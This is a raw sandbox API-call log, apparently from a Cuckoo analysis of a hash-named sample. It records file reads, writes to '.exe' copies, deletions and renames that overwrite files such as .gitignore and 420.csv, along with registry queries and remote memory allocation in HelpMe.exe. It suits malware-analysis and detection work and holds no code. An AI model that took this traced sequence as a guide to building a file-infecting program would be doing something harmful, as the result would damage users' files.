"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->9614"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->9614"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->71"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->71"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->268"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->268"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001e0","lpValueName->AppData"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000001e0","lpValueName->AppData","dwType->1","lpData->C:\Documents and Settings\janettedoe\Application Data","cbData->108"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001dc","hKey->0x000001e0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001dc","lpValueName->Generation"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001dc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001e0","hKey->0x000001dc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001e0","lpValueName->Generation"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001dc","hKey->0x000001e0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001dc","lpValueName->Generation"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\files\.gitignore"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\files\.gitignore.exe","lpNewFileName->C:\cuckoo\files\.gitignore"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\cuckoo\logs\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->268"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","dwDesiredAccess->GENERIC_READ"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001e0","lpFileName->C:\cuckoo\logs\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\cuckoo\logs\.gitignore.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001f0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001fc","hKey->0x000001f0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001fc","lpValueName->Generation"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001fc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001fc","lpValueName->My Pictures"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001fc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000001fc","lpValueName->My Pictures","dwType->1","lpData->C:\Documents and Settings\janettedoe\My Documents\My Pictures","cbData->124"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001fc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001f0","hKey->0x000001fc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001f0","lpValueName->Generation"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->420","szExeFile->b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->9614"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->9614"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->71"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->71"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->268"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->268"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\logs\.gitignore"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\logs\.gitignore.exe","lpNewFileName->C:\cuckoo\logs\.gitignore"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\cuckoo\logs\420.csv","dwDesiredAccess->GENERIC_READ"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->268"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","dwDesiredAccess->GENERIC_READ"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001e0","lpFileName->C:\cuckoo\logs\420.csv","dwDesiredAccess->GENERIC_READ"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\cuckoo\logs\420.csv.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
